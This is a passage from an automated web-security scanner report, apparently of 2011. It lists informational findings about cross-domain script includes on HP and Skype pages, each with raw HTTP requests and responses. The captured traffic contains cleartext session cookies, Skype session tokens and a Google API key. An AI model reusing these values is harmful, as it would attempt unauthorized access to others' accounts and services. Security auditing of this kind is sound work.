<script type="text/javascript" language="javascript" src="http://welcome.hp-ww.com/cma/exceptions/ProCurve/metrics_ProCurve.js">
</script>
...[SNIP]...

18.328. http://h18004.www1.hp.com/products/blades/bladesystem/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h18004.www1.hp.com
Path:   /products/blades/bladesystem/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/blades/bladesystem/index.html HTTP/1.1
Host: h18004.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:31:01 GMT
Server: Apache
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:31:01 GMT
Connection: close
Content-Type: text/html
Content-Length: 81889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Blade servers - HP BladeSystem</title>
<link rel="shortcut
...[SNIP]...
</script>

   <script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<!-- //* Dynamic Overlay script *// -->

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_overlay.js"></script>
...[SNIP]...

18.329. http://h20180.www2.hp.com/apps/Nav  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h20180.www2.hp.com
Path:   /apps/Nav

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /apps/Nav?h_pagetype=s-005&h_cc=us&h_lang=en&h_page=hpcom&h_product=top&h_client=test HTTP/1.1
Host: h20180.www2.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:31:03 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:31:03 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 22420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: G.0.
Copyright 1997-2003 Omniture, Inc. More info available at
http://www.omniture.com --><script language="JavaScript" src="http://welcome.hp-ww.com/country/us/eng/js/hub/metrics.js"></script>
...[SNIP]...

18.330. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /subchoice/country/us/en/subhub.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /subchoice/country/us/en/subhub.aspx HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:31:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-us; path=/
Set-Cookie: cc=us; path=/
Set-Cookie: hp_xp=; expires=Mon, 05-Sep-2011 00:31:08 GMT; path=/; secure
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_htmlTag" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</script> <script type="text/javascript" src="https://secure.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<!-- BEGIN OMNITURE METRICS JAVASCRIPT--> <script type="text/javascript" src="https://secure.hp-ww.com/country/us/eng/js/metricsNApubmktg.js"></script>
...[SNIP]...

18.331. http://h30187.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:11 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:17 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 63660
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

18.332. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /campus/p/campusId/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:19 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:25 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 56488
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

18.333. http://h30187.www3.hp.com/howto_QL_courses.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /howto_QL_courses.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /howto_QL_courses.jsp?contentType=How-to+in+2&mcid=explore-create HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:22 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:29 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 125944
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

18.334. http://h30187.www3.hp.com/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.jsp HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:13 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:20 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 63350
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

18.335. http://h30261.www3.hp.com/phoenix.zhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30261.www3.hp.com
Path:   /phoenix.zhtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /phoenix.zhtml?c=71087&p=irol-irhome HTTP/1.1
Host: h30261.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=52
Date: Sun, 04 Sep 2011 16:32:32 GMT
Content-Length: 44498
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><title>HP Investor Relations - HP Investor relations overview</title><met
...[SNIP]...
ta name="Description" content="Hewlett-Packard financial information including information about the Compaq merger, quarterly results, annual reports, press releases, stock quotes, and SEC filings." /><script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
</script><script language="JavaScript" src="http://media.corporate-ir.net/media_files/irol/global_js/phoenix.js"></script>
...[SNIP]...
<link href="http://media.corporate-ir.net/media_files/irol/71/71087/facebox/facebox.css" media="screen" rel="stylesheet" type="text/css" /><script src="http://media.corporate-ir.net/media_files/irol/71/71087/facebox/facebox.js" type="text/javascript"></script>
...[SNIP]...
</script><script src="http://phx.corporate-ir.net/HttpCombiner.ashx?s=RisenJS&v=2" type="text/javascript"></script>
...[SNIP]...
</table><script language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/metrics_corp.js"></script>
...[SNIP]...

18.336. http://h30434.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30434.www3.hp.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: h30434.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Set-Cookie: VISITORID=1417999999; Domain=.www3.hp.com; Expires=Thu, 04-Sep-2014 09:58:51 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 113442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link cl
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
...[SNIP]...

18.337. http://h30507.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30507.www3.hp.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: h30507.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://hpblogs.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAXjYI2X3BfQRo1rOXPDQHfxQUP4n3zvM7Bc_LRIRttIKr9HdhfhRKLpSWdlW1dW3knT2h0jN_Fqg6Zg"></script>
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAXjYI2X3BfQRo1rOXPDQHfxQUP4n3zvM7Bc_LRIRttIKr9HdhfhRKLpSWdlW1dW3knT2h0jN_Fqg6Zg"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://hpblogs.i.lithium.com/t5/scripts/566D1E9D07A98E2A1B8CB94499878004/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://hpblogs.i.lithium.com/t5/scripts/7B816C1AC1F466DBD3D05A583611A16D/lia-scripts-body-min.js"></script>
...[SNIP]...

18.338. https://h41183.www4.hp.com/inflexion/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h41183.www4.hp.com
Path:   /inflexion/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 HTTP/1.1
Host: h41183.www4.hp.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8r PHP/5.3.6
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 67697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-us" xml:lang="en
...[SNIP]...
<!-- BEGIN METRICS-->
<script type="text/javascript" language="JavaScript" src="https://secure.hp-ww.com/country/us/en/js/metricsNAhhomktg.js"></script>
...[SNIP]...

18.339. http://heartbeat.skype.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://heartbeat.skype.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: heartbeat.skype.com
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Server: Apache/2.2.0 (Fedora)
Content-Type: text/html
Content-Length: 62603
Date: Sun, 04 Sep 2011 21:04:05 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Heartbe
...[SNIP]...
<!-- Javascripts -->
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-share.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.340. http://heartbeat.skype.com/2011/08/paypal_payments_temporarily_un.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://heartbeat.skype.com
Path:   /2011/08/paypal_payments_temporarily_un.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/08/paypal_payments_temporarily_un.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://heartbeat.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: heartbeat.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Server: Apache/2.2.0 (Fedora)
Content-Type: text/html
Content-Length: 52783
Date: Sun, 04 Sep 2011 21:04:11 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>PayPal
...[SNIP]...
<!-- Javascripts -->
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-share.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
<p><script src="http://embed.technorati.com/linkcount" type="text/javascript"></script>
...[SNIP]...
</div>


<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...

18.341. https://login.skype.com/account/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /account/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 21:19:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:35 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 33957
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...

18.342. https://login.skype.com/account/login-form  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/login-form

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/login-form?product-type=package-global-region-landline-eu-unlimited&application=subscription&return_url=https%3A%2F%2Fsecure.skype.com%2Faccount%2Flogin HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; skype-session=l5p5g0er47bh75g44j3p4n46h7

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:19:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315171085:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-2012 21:19:11 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 47339
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://mpsnare.iesnare.com/snare.js"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.343. https://login.skype.com/account/password-automation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-automation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/password-automation HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.skype.com/account/password-reset-request?setlang=en&intsrc=client%7Cforgot-name
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: login.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:00:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-2012 18:00:16 GMT; path=/; domain=.skype.com
Vary: User-Agent,Accept-Encoding
Content-Length: 43776
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="lt
...[SNIP]...
</script>


<script type="text/javascript" src="https://secure.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://secure.skypeassets.com/i/js/ab/mbox.js" charset="utf-8"></script>
...[SNIP]...
</script>


<script src="https://secure.skypeassets.com/i/js/wanalytics/wanalytics-secure.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.344. https://login.skype.com/account/password-reset-request  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.skype.com
Path:   /account/password-reset-request

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /account/password-reset-request?setlang=en&intsrc=client%7Cforgot-pword HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=hvd1f0nqsu93kvs6dhba2diop2; skype-session-token=94fd441852b9e1046c98536f973599d688791fc3
Host: login.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 17:59:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
